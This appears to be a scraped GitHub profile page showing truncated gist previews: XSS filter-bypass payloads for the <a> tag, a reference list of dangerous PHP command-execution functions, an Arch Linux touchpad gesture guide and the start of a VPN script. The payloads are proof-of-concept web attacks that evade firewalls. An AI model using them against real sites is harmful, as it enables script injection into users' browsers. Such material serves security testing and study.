Skip to content

Instantly share code, notes, and snippets.

View atxiii's full-sized avatar
🐱
⛎ Miow

Hossein Shourabi atxiii

🐱
⛎ Miow
View GitHub Profile
@0xSojalSec
0xSojalSec / mutation_a.txt
Created February 12, 2023 17:19 — forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]
@mccabe615
mccabe615 / phpdangerousfuncs.md
Last active June 17, 2024 06:45
Dangerous PHP Functions

Command Execution

exec           - Returns last line of commands output
passthru       - Passes commands output directly to the browser
system         - Passes commands output directly to the browser and returns last line
shell_exec     - Returns commands output
\`\` (backticks) - Same as shell_exec()
popen          - Opens read or write pipe to process of a command
proc_open      - Similar to popen() but greater degree of control
pcntl_exec - Executes a program
@erikzenker
erikzenker / AwesomeGestures.md
Last active May 4, 2024 17:45
OSX like gesture for arch linux onn awesome windowmanager

This is a manual for OSX like touchpad gestures on arch linux for the awesome window manager. It describes how to trigger awesome actions on swiping with three fingers on the touchpad.

  • Install libinput dependencies pacaur -S sf86-input-libinput libinput-gestures

  • Add current user to input group sudo gpasswd -a $USER input

@bigonese
bigonese / vpn.sh
Created January 11, 2017 13:06
Script to start sstp-client on a Mac, connecting to Microsoft VPN, with ability to use Apple's KeyChain
#!/bin/bash
SERVICE_NAME='my-example-vpn'
SERVICE_URL='my-example-vpn.com'
if [[ ${#USER} > 1 ]]
then
read -p "Log in as ${USER}? [y/n] " LIA
else
LIA = 'n'